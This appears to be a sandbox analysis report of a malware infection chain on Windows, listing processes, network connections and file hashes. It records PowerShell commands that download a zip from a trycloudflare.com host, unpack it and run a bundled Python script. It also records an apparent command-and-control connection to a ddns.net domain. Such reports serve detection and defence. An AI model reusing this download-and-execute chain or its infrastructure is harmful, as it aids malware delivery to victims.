"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://stocks-army-malta-false.trycloudflare.com/a.pdf
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb70033cb8,0x7ffb70033cc8,0x7ffb70033cd8
C:\Windows\system32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://stocks-army-malta-false.trycloudflare.com/qfv0ao.zip' -OutFile 'C:\Users\Admin\Downloads\qfv0ao.zip' }"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4740 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=5088 /prefetch:6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\qfv0ao.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6128 /prefetch:2
C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe
python.exe new.py
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://stocks-army-malta-false.trycloudflare.com/b.pdf
C:\Windows\system32\timeout.exe
timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb70033cb8,0x7ffb70033cc8,0x7ffb70033cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1824,17769282416053410903,10498417105262218597,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | stocks-army-malta-false.trycloudflare.com | udp |
| US | 104.16.230.132:443 | stocks-army-malta-false.trycloudflare.com | tcp |
| US | 104.16.230.132:443 | stocks-army-malta-false.trycloudflare.com | tcp |
| BE | 23.14.90.104:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 154.127.53.157:7000 | mayfixworm.ddns.net | tcp |
| N/A | 52.182.141.63:443 | tcp |
Files
memory/4540-1-0x00007FFB5E6E3000-0x00007FFB5E6E5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | ffa07b9a59daf025c30d00d26391d66f |
| SHA1 | 382cb374cf0dda03fa67bd55288eeb588b9353da |
| SHA256 | 7052a8294dd24294974bb11e6f53b7bf36feeb62ce8b5be0c93fbee6bc034afb |
| SHA512 | 25a29d2a3ba4af0709455a9905a619c9d9375eb4042e959562af8faa087c91afafdb2476599280bbb70960af67d5bd477330f17f7345a7df729aaee997627b3a |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_il03lsgc.4c0.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4540-15-0x000002552F060000-0x000002552F082000-memory.dmp
memory/4540-16-0x00007FFB5E6E0000-0x00007FFB5F1A2000-memory.dmp
memory/4540-17-0x00007FFB5E6E0000-0x00007FFB5F1A2000-memory.dmp
\??\pipe\LOCAL\crashpad_3252_ZMUIZCWZYHJGNYEK
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8e1dd984856ef51f4512d3bf2c7aef54 |
| SHA1 | 81cb28f2153ec7ae0cbf79c04c1a445efedd125f |
| SHA256 | 34afac298a256d796d20598df006222ed6900a0dafe0f8507ed3b29bfd2027d7 |
| SHA512 | d1f8dfc7fdc5d0f185de88a420f2e5b364e77904cab99d2ace154407c4936c510f3c49e27eed4e74dd2fbd850ad129eb585a64127105661d5f8066448e9f201d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4fc9e007aced24753db207a6bff4caa2 |
| SHA1 | 1ccb7613e68ed1278ec28b87e56fa225b8b16a23 |
| SHA256 | 78e351f7669743bbc484664c5763eaafffe612145561ee7cfccc73d234c1781c |
| SHA512 | 6a27e44020a4a6b1f97e2231e4f9fa761b05e1025df5c0857a06f0cfe7739c4893292825cc4a897f3bc42f3c19a24bb8f1ef19cdde53e11f53f94987f7fab262 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 49f7e92518a8247c2d18478f2f32155f |
| SHA1 | b339c806107d25bc61c19ffeaf513a18bf9d3f12 |
| SHA256 | e63410793596cab8d1751d8a865513a779e0ccb582db514bd1e34dc0f35a4fda |
| SHA512 | d9f898734d31faeb880ee040c796e830f050d31f2e58ae318d908a92ddfb268b59d1db8f5626ed4aaa6ab5489237e60fbf4f4be6807986c23e8c199522676878 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | be9198ff0aa2c2c3f6257413826d5e55 |
| SHA1 | 36de4f5f105634ca40c2c6d520014a4ad3999c71 |
| SHA256 | 75cd55b76600d693e2a52d79685925a2e5a0cc2b3d84c81c1ae3253b8fa01fea |
| SHA512 | 870b597a9690efe02be1478ac36f91645625f62ca4c3fcc78f007fc13b754ec001ad2cee4e784479ac8cfa0f25b6fa377ee817cb405ec0f4aed18dfbc051155a |
memory/4540-80-0x00007FFB5E6E0000-0x00007FFB5F1A2000-memory.dmp
memory/4540-81-0x00007FFB5E6E3000-0x00007FFB5E6E5000-memory.dmp
memory/4540-82-0x00007FFB5E6E0000-0x00007FFB5F1A2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 7ac18e782ec33eb67a916fb99648d6bf |
| SHA1 | dc223f4a3721846aa4965d1a00ceb6f344ad9b29 |
| SHA256 | 4b39d0754b9cd7efbbe1d19d372672bbc97acaefc22fbf6b36482aa6ece440c2 |
| SHA512 | 481dd9205823c6397983bf193070237a03d070e82bfc74c863113dbc992476f26329404336ebd8bc9212e55dba042ec5da57d62e4a634490c6f1e58e494a21bf |
memory/4540-133-0x00007FFB5E6E0000-0x00007FFB5F1A2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b94a5f9c019b614942fc29d049e77006 |
| SHA1 | 7d22a700e14c52c6ded2a26cc063057b779d5c2e |
| SHA256 | ac01c39f1027c82f8d739b7a15c8fc17875bf33f3069f9acf0eb4a0d3b8803d7 |
| SHA512 | 301825dd58920d02a28650c9bd9a43d36d5d896fa72b79b49792a868f2df4d419dd6fdfe245f544f8becaff9585e63050fe2e6979dbc35a592017423a392633e |
memory/2160-145-0x00000263C1F30000-0x00000263C1F3A000-memory.dmp
memory/2160-144-0x00000263C1F50000-0x00000263C1F62000-memory.dmp
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\django-stubs\django-stubs\contrib\flatpages\urls.pyi
| MD5 | 72baef07657af40bbb9421362b0c67cd |
| SHA1 | e0e802c0e54240712b8bd8418627b2ffa123bc94 |
| SHA256 | a0869d2c9451a944b87f059edc5d93c1d415888b98b9247b8aeb5489d9dcba7d |
| SHA512 | 32e4cddc4df9759ad46f617cd69b2adc130a918cac4f588cf563d8e3c298ece3a5bb0a9dc9a082cbdc015f2789336a6e67d545603ea69477fc5de28256fd6d06 |
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\django-stubs\django-stubs\core\mail\backends\filebased.pyi
| MD5 | 7f6526c1bbcb2aa7ba6a8cde268765bc |
| SHA1 | cfc87c1fd110239d47886e0c5ebcad54bd453bbe |
| SHA256 | ae9de027f591acfedc0ba387099c4398c0841a9c126535d313ffbdb18184eea0 |
| SHA512 | 3c6f26b5f0ab2bc22e72e116ffe28624e5d971a86b9d85e5f733844827e784b8349c46fa46ca5390bc972607b7fb5b37a6fb47b410e105f02b147dfe77a737c7 |
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\django-stubs\django-stubs\core\management\commands\testserver.pyi
| MD5 | 6b8cad3305cef8186496283d80f5ea37 |
| SHA1 | 418009700ba673f4aebf49db46d1f44384d4f8f8 |
| SHA256 | 1a4fa10dd76be871ebe4f02bc9ccf70eaa1e178efa5291aa6aff471a9fcdb272 |
| SHA512 | e06ba45ea1bd65681f3be4a85118d4bc75c961e82dc6d319c6a2b1a7a39533732fe7c5d152ea978e0dd62c1ea520eb62c9322eaed82ca5588495fa1465f71555 |
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\typeshed\stdlib\2and3\ntpath.pyi
| MD5 | 05fbc4e476029d491dbc02a9522c6e04 |
| SHA1 | 061fe610c5eb467fa554f8dd131c5725c84fe14d |
| SHA256 | 2875c0ab8ecc2fc5d7a6192bc2f35a5161193e747825e1081ef33f9b10a5459c |
| SHA512 | 6afd03793a31a76a0b51da83e6c1037e536025ecfaf1e0a752ce4ca471100e29c2a2ff5c54a0cec07c64653b83fdac9c0d6d78b55c50c685d8452f900896226b |
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\typeshed\third_party\2and3\cryptography\hazmat\__init__.pyi
| MD5 | 84a27291937d76e46b277653002601f2 |
| SHA1 | fe60efb40aeeee2998bb07245d4f9571ad08825f |
| SHA256 | ddf071712a6926be84384714a23bdf946dc47a083b96fd90a7474d41020bacfe |
| SHA512 | e489e83fd33fdc8ba88954725f79c2132bc4162ba713c72b190b790b4a368e3ceb024d7b8bceec4544123a5435fdfd987876f1b2542da06cba899f5ac72945be |
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\typeshed\third_party\3\docutils\parsers\__init__.pyi
| MD5 | ca0671203ef640e39118196d5af0987c |
| SHA1 | 0567568d191018e003ce5866f33ac4725ac30304 |
| SHA256 | 0505540b357c942ca59e62c2b67374633fedb65ab2cdc2dcf81671d8a3d73f33 |
| SHA512 | 322fe9032e26defb6abf33051093924a4fa9beff5a5e619acdd3f0da975fadb81388a50d6e037798a73896762d1ab2ce0e189c4aae2b580988fa4a3229f5712b |
C:\Users\Admin\Downloads\qfv0ao\App\PyScripter\Lib\Lsp\jls\jedilsp\jedi\third_party\typeshed\third_party\3\six\moves\SimpleHTTPServer.pyi
| MD5 | 59c113ba8da07ed8b8cf1d9fa0cb0a08 |
| SHA1 | b29c918fa7f8eb1f29f0a940f7bc3473d1f5d5e1 |
| SHA256 | bed05425469b4eb2152bdec29f43212d48474a56e61c1f10810956c1a747fbac |
| SHA512 | 98a1b860fb715c34568ec9247df52f480fd5fa72eac8c3b34954bfc2b35fb4b0bf73ea421950a9c027a20fc364207bf930edff3033490acf4011098afbe098e1 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Lib\site-packages\setuptools-58.1.0.dist-info\INSTALLER
| MD5 | 365c9bfeb7d89244f2ce01c1de44cb85 |
| SHA1 | d7a03141d5d6b1e88b6b59ef08b6681df212c599 |
| SHA256 | ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508 |
| SHA512 | d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Lib\test\cjkencodings\shift_jis-utf8.txt
| MD5 | cc34bcc252d8014250b2fbc0a7880ead |
| SHA1 | 89a79425e089c311137adcdcf0a11dfa9d8a4e58 |
| SHA256 | a6bbfb8ecb911d13581f7713391f8c0ceea1edd41537fdb300bbb4d62dd72e9b |
| SHA512 | c6fb4a793870993a9f1310ce59697397e5334dbb92031ab49a3ecc33c55e84737e626e815754c5ddbe7835b15d3817bf07d2b4c80ea5fd956792b4db96c18c2f |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Lib\test\test_importlib\builtin\__main__.py
| MD5 | 47878c074f37661118db4f3525b2b6cb |
| SHA1 | 9671e2ef6e3d9fa96e7450bcee03300f8d395533 |
| SHA256 | b4dc0b48d375647bcfab52d235abf7968daf57b6bbdf325766f31ce7752d7216 |
| SHA512 | 13c626ada191848c31321c74eb7f0f1fde5445a82d34282d69e2b086ba6b539d8632c82bba61ff52185f75fec2514dad66139309835e53f5b09a3c5a2ebecff5 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Lib\test\test_importlib\frozen\__init__.py
| MD5 | c3239b95575b0ad63408b8e633f9334d |
| SHA1 | 7dbb42dfa3ca934fb86b8e0e2268b6b793cbccdc |
| SHA256 | 6546a8ef1019da695edeca7c68103a1a8e746d88b89faf7d5297a60753fd1225 |
| SHA512 | 5685131ad55f43ab73afccbef69652d03bb64e6135beb476bc987f316afe0198157507203b9846728bc7ea25bc88f040e7d2cb557c9480bac72f519d6ba90b25 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Lib\test\test_importlib\namespacedata01\binary.file
| MD5 | 37b59afd592725f9305e484a5d7f5168 |
| SHA1 | a02a05b025b928c039cf1ae7e8ee04e7c190c0db |
| SHA256 | 054edec1d0211f624fed0cbca9d4f9400b0e491c43742af2c5b0abebf0c990d8 |
| SHA512 | 4ec54b09e2b209ddb9a678522bb451740c513f488cb27a0883630718571745141920036aebdb78c0b4cd783a4a6eecc937a40c6104e427512d709a634b412f60 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Scripts\pip3.10.exe
| MD5 | ba23b0cbda2ceaa83a2e6af4971445cb |
| SHA1 | 7af61089f263592ca8e9c66606921fefe217d79a |
| SHA256 | cefec4eb45b156bb1a0228e1fe8b002a9324bd9e9208706aca539045385a372b |
| SHA512 | d2918c41122dac14a39b00e53ab9c1f48e40c0fc4ce0ee4853dc271ecf99b661a3a12bbeb338b3da74fe42ff107fe33c560584b33cf7c20990975fbc08dc3d36 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\Tools\pynche\__init__.py
| MD5 | 3d02598f327c3159a8be45fd28daac9b |
| SHA1 | 78bd4ccb31f7984b68a96a9f2d0d78c27857b091 |
| SHA256 | b36ae7da13e8cafa693b64b57c6afc4511da2f9bbc10d0ac03667fca0f288214 |
| SHA512 | c59c5b77a0cf85bb9fbf46f9541c399a9f739f84828c311ced6e270854ecce86d266e4c8d5aa07897b48ce995c3da29fea994e8cd017d48e5a4fab7a6b65e903 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\python.exe
| MD5 | b1e4a59f3f1c7b6f250319d58798d3b9 |
| SHA1 | c894fa0a49480be671f8e5209b96da1d3dfbeae1 |
| SHA256 | 0467df606d98305b25a040e051cf8876a553a61da1031e51e6e77b15fb18b964 |
| SHA512 | c573148efc2cf00d38859c87c23c2bd01eac0c85081f2c0dde65cf81f4ee3e069cc22f21601daa7ed02be3203d278f6ad5ec14361eeb31d7aebc10e29b963901 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\vcruntime140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
C:\Users\Admin\Downloads\qfv0ao\App\Python\python310.dll
| MD5 | e9c0fbc99d19eeedad137557f4a0ab21 |
| SHA1 | 8945e1811ceb4b26f21edcc7a36dcf2b1d34f0bf |
| SHA256 | 5783c5c5a3ffce181691f19d27de376a03010d32e41360b72bcdbd28467cfcc5 |
| SHA512 | 74e1289683642ae2bc3cf780a07af1f27fed2011ef6cc67380f9c066c59d17a2fb2394a45a5c6cd75dad812a61093fdbd0f2108925f5c58fc6644c1c98be5c0b |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\abc.cpython-310.pyc
| MD5 | 9e3c38d1f85f72098a98071d406961d4 |
| SHA1 | c51f2744c54e92eec5d12d7c48426bfe65466157 |
| SHA256 | f36215beaa5a0335db4efea4f42647744bd5b8cd5b10b2bd7b1184da303b18db |
| SHA512 | 5aaaa85041846004dd8ca4c5874969b09c9e966cf70ae21e36cc49a838a99630b3e23f8844af197614a40be207d7b266adee26e34634b0b995042589b5c42df6 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\new.py
| MD5 | 59c51d4fd69fe3721314d8ead661c8b0 |
| SHA1 | dd1608a5c6d34eaf874b4eda11abf6c3555a8761 |
| SHA256 | 69a1d3e1a202f448443be5a3f41167220ff1203cd557fa050c0135220cb8a184 |
| SHA512 | e41983097fa3c6f1bb88c275e4f278931b4f27ffb4bd544440f0b6ad0e09116da52f108a8cdc68a5887fa873338e1ef3f1825ece11b13dafaf4cf14d41128062 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\site-packages\distutils-precedence.pth
| MD5 | c39367750a2ad85b290fa7595d4cc457 |
| SHA1 | 4e2b7b413113994e4730efe03e564a84cebe2d73 |
| SHA256 | 7ea7ffef3fe2a117ee12c68ed6553617f0d7fd2f0590257c25c484959a3b7373 |
| SHA512 | 40e5b4813f24601ad581c93fa0115454ef89e61f6b911644e3b89946280ff97cbd46ae00287d8dc71392ef6c940ebaa173d2e3c32df72f0aa27d65ed73fe37c1 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\_sitebuiltins.cpython-310.pyc
| MD5 | 56b7ab2668dbaa099f10e532ff2c15ec |
| SHA1 | 19dbbbdda57f313b9c33314589d07dfb07d5dfaa |
| SHA256 | 8ee72bb1626df1dff13d7e587e8d736895e9f6c280c24c7c8a3106150a686eac |
| SHA512 | 72127ef9d90c2b2b2c0e604d9dffb0175463289a27e5e8f2da9d2f1e28dbfecf7ce08b99f3ff03eeac7b9d778f41ee44404b4e07e4e3865c088b05735e03eea1 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\_sitebuiltins.py
| MD5 | 2e95aaf9bd176b03867862b6dc08626a |
| SHA1 | 3afa2761119af29519dc3dad3d6c1a5abca67108 |
| SHA256 | 924f95fd516ecaea9c9af540dc0796fb15ec17d8c42b59b90cf57cfe15962e2e |
| SHA512 | 080495fb15e7c658094cfe262a8bd884c30580fd6e80839d15873f27be675247e2e8aec603d39b614591a01ed49f5a07dd2ace46181f14b650c5e9ec9bb5c292 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\__pycache__\genericpath.cpython-310.pyc
| MD5 | 9f51f01011c5a6433fdfe6cd74efc7dc |
| SHA1 | 734fa5a598d8c83b3bd6815c647c94cdc9651b7f |
| SHA256 | 86cde33bfb8a6b6d45afc7e47006b5078fa1b3c374be8085e812af1d99eb23fe |
| SHA512 | 7b0a1019afbbf1ea9b9c246ef60c326e0b59e8fff63e63c3b285c5685b49eb916701de98014a54cfa558fe07b1bfb2991eb86e3635344de186bcd6b8af8f6b11 |
C:\Users\Admin\Downloads\qfv0ao\App\Python\lib\genericpath.py
